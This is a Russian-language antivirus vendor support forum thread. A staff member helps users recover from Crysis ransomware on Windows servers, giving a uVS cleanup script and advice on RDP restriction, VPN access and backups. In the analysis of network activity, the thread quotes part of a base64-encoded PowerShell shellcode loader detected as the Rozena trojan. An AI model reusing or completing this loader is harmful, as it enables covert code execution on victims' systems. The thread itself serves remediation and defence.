посмотрите, что можно сделать через ELA
https://help.eset.com/ela/ru-RU/?unit_management.html

@Эдуард Чариков,
напишите в техподдержку [email protected]

[QUOTE]Роман Фадеев написал:
здравствуйте, вирус проник в базу 1с, в результате файлы стали .adobe

[URL=https://www.sendspace.com/file/j4r09c]https://www.sendspace.com/file/j4r09c[/URL] [/QUOTE]
@Роман Фадеев,

судя по образу автозапуска система уже очищена от вредоносных файлов шифратора.

по расшифровки .adobe, к сожалению, не сможем вам помочь, восстановление документов на текущий момент возможно,
только из архивных копий документов. (о которых не следует забывать в связи активностью шифраторов, и прочих катастроф)

в любом случае:

3. по расшифровке файлов при наличие лицензии на продукты ESET сделайте запрос в [email protected]
(хотя расшифровки по crysis.adobe на текущий момент нет)

4. важные зашифрованные документы, сохраните на отдельный носитель, возможно расшифровка станет доступной в будущем.

на будущее:
5. ограничьте доступ к серверу по RDP из внешней сети, сделайте настройки по ограничению попыток неправильного ввода паролей, чтобы блокировать потенциальных взломщиков учетных записей.
если сервер в вашей локальной сети, желательно настроить доступ из внешней сети к рабочим серверам через VPN подключение.
--------
злоумышленники, которые распространяют Crysis, как правило используют возможности получения доступа к RDP, путем взлома учетных записей на сервере.

[QUOTE]Aleksandr Lebowski написал:
Спасибо за ответ ) наверное полностью все сносить будем жаль что файлы не расшифровать  [/QUOTE]
да, сейчас не расшифровать.
на этот пункт обратите внимание.

[QUOTE]5. ограничьте доступ к серверу по RDP из внешней сети, сделайте настройки по ограничению попыток неправильного ввода паролей, чтобы блокировать потенциальных взломщиков учетных записей.
если сервер в вашей локальной сети, желательно настроить доступ из внешней сети к рабочим серверам через VPN подключение.
[/QUOTE]
скорее всего был подобран пароль к какой либо учетной записи.

[QUOTE]Aleksandr Lebowski написал:
По поводу очистки системы,  это мы удаляем сам вирус?
и пункт 6, можете пояснить,  я не понял  [/QUOTE]

да, судя по образу в системе был активен файл шифратора. в процессах:

Цитата
; Процессы

?ВИРУС? (A)| C:\PROGRAM FILES (X86)\TEAMVIEWER\TEAMVIEWER.EXE
?ВИРУС? (A)| C:\PROGRAM FILES (X86)\TEAMVIEWER\TEAMVIEWER_SERVICE.EXE
[B]Win32/Filecoder.Crysis.L(64)| C:\USERS\АДМИНИСТРАТОР\APPDATA\ROAMING\EX.EXE[/B]
АКТИВЕН    | C:\PROGRAM FILES (X86)\RAID WEB CONSOLE 2\FRAMEWORK\VIVALDIFRAMEWORK.EXE

без очистки системы, новые файлы будут опять зашифрованы.

по п.6 powershell установил подключение с адресом:
NetRange:       185.0.0.0 - 185.255.255.255
City:           Amsterdam
Country:        NL

и выполняет закодированный скрипт. который кстати, детектируется антивирусом как
[B]PowerShell/Rozena.AF троянская программа[/B]
----------
возможно, скрипт работает на майнинг.
после очистки системы скриптом uVS необходимо выполнить сканирование системы штатным антивирусом если не планируете восстановить систему до безопасной точки восстановления, или переустановить систему.

если антивирусная защита не установлена, необходимо установить антивирусный продукт. например. ESET File Security v 6 или 7

[QUOTE]Aleksandr Gordichuk написал:
Здравствуйте!
На Windows Server 2012 поймали шифровальщика в adobe ( [URL=mailto:[email protected]][email protected][/URL] )

[URL=https://cloud.mail.ru/public/DzTz/HvhvCXtKs]Зашифрованные файлы[/URL]
[URL=https://cloud.mail.ru/public/4Bqs/RuEnCrTnV]Образ автозапуска[/URL] [/QUOTE]

по очистке системы выполните скрипт:

выполняем скрипт в uVS:
- скопировать содержимое кода в буфер обмена;
- стартуем uVS(start.exe), далее выбираем: текущий пользователь, меню - скрипты - выполнить скрипт из буфера обмена;
- закрываем все браузеры перед выполнением скрипта;
при деинсталляции программ - соглашаемся на деинсталляцию_удаление подтверждаем "да"
[code]

;uVS v4.1.2 [http://dsrt.dyndns.org]
;Target OS: NTv6.3
v400c
OFFSGNSAVE
zoo %SystemDrive%\USERS\АДМИНИСТРАТОР\APPDATA\ROAMING\INFO.HTA
;------------------------autoscript---------------------------

del %SystemDrive%\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\DESKTOP.INI.ID-6E48641C.[[email protected]].ADOBE
del %SystemDrive%\USERS\АДМИНИСТРАТОР\APPDATA\ROAMING\MICROSOFT\­WINDOWS\START MENU\PROGRAMS\STARTUP\DESKTOP.INI.ID-6E48641C.[[email protected]].ADOBE
delall %SystemDrive%\USERS\АДМИНИСТРАТОР\APPDATA\ROAMING\INFO.HTA
delall %Sys32%\INFO.HTA
zoo %SystemDrive%\USERS\АДМИНИСТРАТОР\APPDATA\ROAMING\EX.EXE
addsgn A7679B1BB9DA4D720B132BD59A37ED05258AFC31CC061F7885C302F9A8D6­714C237F43573E55F549CBC084F77AB749FA155F083255B230CC6D774CEE­A8F9DDF0 8 Win32/Filecoder.Crysis.L 7

zoo %SystemDrive%\USERS\АДМИНИСТРАТОР\APPDATA\ROAMING\MICROSOFT\­WINDOWS\START MENU\PROGRAMS\STARTUP\EX.EXE
zoo %SystemDrive%\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\EX.EXE
zoo %Sys32%\EX.EXE
chklst
delvir

delref %SystemDrive%\USERS\АДМИНИСТРАТОР\APPDATA\ROAMING\MICROSOFT\­WINDOWS\START MENU\PROGRAMS\STARTUP\DESKTOP.INI.ID-6E48641C.[[email protected]].ADOBE
delref HTTPS://CLIENTS2.GOOGLE.COM/SERVICE/UPDATE2/CRX?RESPONSE=REDIRECT&PRODVERSION=38.0&X=ID%3DEFAIDNBMNNNIBPCAJPCGLCLEFINDMKAJ%26INSTALLSOURCE%3D­ONDEMAND%26UC
delref %SystemDrive%\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\DESKTOP.INI.ID-6E48641C.[[email protected]].ADOBE
apply

deltmp
czoo
;-------------------------------------------------------------

QUIT
[/code]
без перезагрузки, пишем о старых и новых проблемах.
------------
....
3. по расшифровке файлов при наличие лицензии на продукты ESET сделайте запрос в [email protected]
(хотя расшифровки по crysis.adobe на текущий момент нет)

4. важные зашифрованные документы, сохраните на отдельный носитель, возможно расшифровка станет доступной в будущем.

5. ограничьте доступ к серверу по RDP из внешней сети, сделайте настройки по ограничению попыток неправильного ввода паролей, чтобы блокировать потенциальных взломщиков учетных записей.
если сервер в вашей локальной сети, желательно настроить доступ из внешней сети к рабочим серверам через VPN подключение.

6. обратите внимание на сетевую активность powershell
83.171.107.131:49157 <-> 185.224.249.30:9425
при этом выполняется закодированный в base64 скрипт.
[CODE]JABTAHQASQBwACAAPQAgACcAJABJAHAAYgBBACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwBTAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBGAGwAYQBnAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEkAZAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAEkAcABiAEEAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAZABiACwAMAB4AGQAZgAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQBkACwAMAB4AGIAOAAsADAAeAA2ADQALAAwAHgANwBiACwAMAB4ADAAOAAsADAAeAA4ADAALAAwAHgAMgA5ACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANAA3ACwAMAB4ADgAMwAsADAAeABlAGQALAAwAHgAZgBjACwAMAB4ADMAMQAsADAAeAA0ADUALAAwAHgAMQA0ACwAMAB4ADAAMwAsADAAeAA0ADUALAAwAHgANwAwACwAMAB4ADkAOQAsADAAeABmAGQALAAwAHgANwBjACwAMAB4ADkAMAAsADAAeABkAGYALAAwAHgAZgBlACwAMAB4ADcAYwAsADAAeAA2ADAALAAwAHgAOAAwACwAMAB4ADcANwAsADAAeAA5ADkALAAwAH[/CODE]
а так же обнаружен внедренный поток.

(!) ПРЕДУПРЕЖДЕНИЕ: Обнаружен внедренный поток в процессе C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE [1828], tid=1972

[QUOTE]Anton Ivanov написал:
Добрый вечер!

Столкнулся с аналогичной проблемой, периодически вылезает реклама в хроме. Воспользовался утилитой FarBar Recovery: получил лог FRST. Что делать дальше?[/QUOTE]
нужен образ автозапуска системы.

[QUOTE]Татьяна Колдышева написал:
а как удалить то что в карантине?[/QUOTE]
на первом рисунке у вас написано "управление карантином". поставьте галку - "удалить файлы из карантина".

то что в карантине можно удалить.
судя по первому рисунку с загрузочным сектором все в порядке.

напишите в [email protected]